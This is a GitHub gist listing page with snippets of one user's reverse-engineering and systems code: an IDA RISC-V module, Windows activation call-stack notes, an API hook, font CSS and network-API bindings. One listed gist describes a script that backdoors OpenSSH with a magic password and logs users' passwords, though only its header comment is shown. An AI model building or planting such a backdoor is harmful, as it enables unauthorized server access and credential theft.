Skip to content

Instantly share code, notes, and snippets.

NyaMisty

Block or report user

Report or block NyaMisty

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@NyaMisty
NyaMisty / riscv-processor-deva.py
Created Jul 9, 2017
Enhanced RISC-V Processor
View riscv-processor-deva.py
import pydevd
pydevd.settrace('localhost', port=15306, stdoutToServer=True, stderrToServer=True)
from idaapi import *
from idc import *
import idautils
import copy
import ctypes
@NyaMisty
NyaMisty / gist:3bcfa09eaa900221803a1f603b486da1
Created Jul 31, 2017
Windows 10 14393 Store App Verify Elevated Call Stack
View gist:3bcfa09eaa900221803a1f603b486da1
(launcher) ShellExecute...etc.
(launcher) IApplicationActivationManager::ActivateApplication::..
(ActXPrxy.dll) ====RPC====
(sihost.exe) twinui.appcore.dll::CApplicationActivationManager::..
(ActXPrxy.dll) ====RPC====
(sihost.exe) ActivationManager.dll::Execution::ActivationManagerShim::ActivateApplicationForProtocol
(sihost.exe) ActivationManager.dll::Execution::ActivationManagerShim::ActivateApplicationForContractByAcid
(sihost.exe) ActivationManager.dll::Execution::ActivationManagerShim::ActivateApplicationForContractByAcidAsUserWithHost
(sihost.exe) ActivationManager.dll::Execution::ActivationManagerShim::_ActivateApplicationForContractByAcid
(sihost.exe) twinui.appcore.dll::CApplicationActivationManager::ActivateApplicationForContractByAcidAsUserWithHost
@NyaMisty
NyaMisty / openssh-autobackdoor.bash
Last active Oct 15, 2017 — forked from system123/openssh-autobackdoor.bash
This script provides OpenSSH backdoor functionality with a magic password and logs passwords as well. It leverages the same basic idea behind common OpenSSH patches but this script attempts to make the process version agnostic. Use at your own risk.
View openssh-autobackdoor.bash
#!/bin/bash
# ============================================
# satyr's openssh autobackdooring doohicky v0.-1
# ImpendingSatyr@gmail.com
# ============================================
# USAGE:
# Run this script with no args and it'll prompt for the "Magic" password and location to log passwords to (incoming and outgoing).
# If you give the location that passwords will be logged to as an arg, this script will try to automate almost everything
# (Like common openssh compiling problems, such as missing pam, kerberos, zlib, openssl-devel, etc.
# [it'll install them via apt or yum, whichever is available]).
View ldasm.py
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
@NyaMisty
NyaMisty / apihook.py
Last active Aug 23, 2018
Python APIHook
View apihook.py
MAX_INSN_LEN = 15 # maximum length of x86 instruction
JMP_OPCODE = 0xE9
PUSH_OPCODE = 0x68
MOV_OPCODE = 0xC7
RET_OPCODE = 0xC3
MOV_MODRM_BYTE = 0x44 # write to address + 1 byte displacement
MOV_SIB_BYTE = 0x24 # write to [rsp]
@NyaMisty
NyaMisty / .css
Created Oct 11, 2018
Huakang Shaonv Font CSS.css
View .css
@font-face {
font-family: 'huakang_shaonv_for_powerline';
src: url(data:application/font-woff2;charset=utf-8;base64,d09GMgABAAAAAF0sABEAAAAAwBQAAFzDAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP0ZGVE0cGh4GYACDYghaCYRlEQgKgthUgrRsATYCJAOHIguDVAAEIAWGIgeFTAyCaj93ZWJmBhsoqzXizQ4FdAfwqFRqVTUSIWwcIIB+lzoyEGwcEEjgYfb/fz5ujIEPWtn3JLZk2xasrMoikzWcmms09pwoKqeed20Uxtt5hIM950fF+9CkkablnVWkqLBII00DSujS/+fQnVq+Q4pPZDh+WDAklqDBlrGCzJsK/Q5DyXpeFKeo3Wnu6EEuzBNs7ivPlcYXbd9//XR/rFnKoJElUklix4LuG5inkKF0XYo2FFrR4Q4OSYLI+lHd56uZWsA925v470bATGCfNAFvZiU+iT7BPUBu6xRQLByo4EbcKW40IUUB5ZQ7GYIiiIgIIghu0HBQjpXmGqU2NLU9/m3YW9/aNn+0vu9X9WPFw//vj2+f+85Houpv7BwlJSiDjMxyZJs1EaFPk5N0TNP/iDzGGGFMCEZ8jDEiEsF6imIriXJczh5XdddbFO2WW29TvK7YXfh/mvZ7yWbL5Cezybbfyw2tDKV5PAiFcAiFk+39qgQaYY7D7n42/aR1coXkXBckHo1sz0v2ExTNOVOUV7RUEb0egBYC7YdBN/8LJBACUSBIQwsVakbpU/2m059uWX27db9tvyVzVeVo2pckurtwi3HDcizaUY3ZuntvkugznySfxmT/kXEkOEB9wML/l6n5PSJqNeuwmAYJT9B4gITAAd2jnM18ECkIonteN3arFGQ/SH6Q9zeVO/9Tl0k2/7cKVml7m4NQNPEqpEknT+pwx3xYIXh9WN1Pdr07n2jaVH1SHfcCY97BpfkFDxYfbIok
View huakang_shaonv_for_powerline_updated.css
This file has been truncated, but you can view the full file.
/*! Generated by Font Squirrel (https://www.fontsquirrel.com) on January 5, 2019 */
@font-face {
font-family: 'huakang_shaonv_for_powerline_updated';
@NyaMisty
NyaMisty / iphlpapi.py
Created Oct 21, 2019
Python binding for GetIfTable2, GetIpInterfaceTable and GetAdaptersInfo
View iphlpapi.py
import ctypes
from ctypes import Structure, POINTER, c_char, c_void_p, c_ulong
from ctypes.wintypes import DWORD, UINT, BYTE, BOOL, ULONG, WCHAR, WORD, USHORT, BOOLEAN
from winerror import NO_ERROR, ERROR_INSUFFICIENT_BUFFER
from comtypes import GUID
ULONGLONG = ctypes.c_ulonglong
ULONG64 = ctypes.c_uint64
UCHAR = ctypes.c_ubyte
You can’t perform that action at this time.